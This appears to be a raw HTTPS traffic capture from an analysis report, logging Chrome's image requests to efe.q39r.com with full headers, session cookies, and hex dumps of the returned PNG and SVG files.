                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: fc 59 8a 7a e5 1a fe a8 e0 5b 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7
                                                                                  Data Ascii: Yz[n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gv


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.1749776172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1113OUTGET /uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC644INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 231
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnOJKiTJbsay%2BVafFbaqieZzYg52LvtfEh65cgsYZkvZ4lQdkHczSKeAVcx38PyJwsii1wb1PKp1kyYvm4v7KAHBzD8iqMUOgPh6gELET%2BfwnNEdB5B2J0gp5YfqMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb00c53b0cf-ATL
                                                                                  2024-04-25 16:23:36 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.1749775172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1112OUTGET /ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC656INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=736VhhOglXDjDmxmY2dRNeXoujRtJojspk8G1p7aaJnWIaxRspOjHFLtFoMbBvqVry%2Bf4EBlJoklvzNZHEebymvCTDDJr2P1nVxFaSqCOOS06eAyc1UW%2B%2FH1kMhOOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb00a8bb0c3-ATL
                                                                                  2024-04-25 16:23:35 UTC713INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                  Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e
                                                                                  Data Ascii: 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e
                                                                                  Data Ascii: 302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e
                                                                                  Data Ascii: .1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32
                                                                                  Data Ascii: 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 2
                                                                                  2024-04-25 16:23:35 UTC1209INData Raw: 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34
                                                                                  Data Ascii: 977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.704
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.1749777172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1116OUTGET /opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC653INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 727
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XaOK9M8hOnUx6j8%2Bye%2FeFBaVWFL%2BqJYJ03AT4OeIH7dCdae6k87ExbGTBh0x%2FmjGR1kHO9rgpVagCWgUWkxD3gLTjCuJh9mgcftF6nr%2F93qiervyfhvT2f7I1fVOSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb0180e675d-ATL
                                                                                  2024-04-25 16:23:36 UTC716INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                  Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                                                  2024-04-25 16:23:36 UTC11INData Raw: 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.2.1749774172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1506OUTGET /uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC677INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 70712
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PoJ7Nq5X5Q%2FL2Y7aCQFaFKeaS2AI6%2B6HyZ0zn4oCyss9oBATGjFDk6y8dNO%2BZG%2BpBLA5I5Vlsumve104iZr1zVETQ61CVdTAEwKpCCJXtiqKva5L%2BgmNJD2L7H6GIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadafdd5ab0e8-ATL
                                                                                  2024-04-25 16:23:35 UTC692INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                  Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
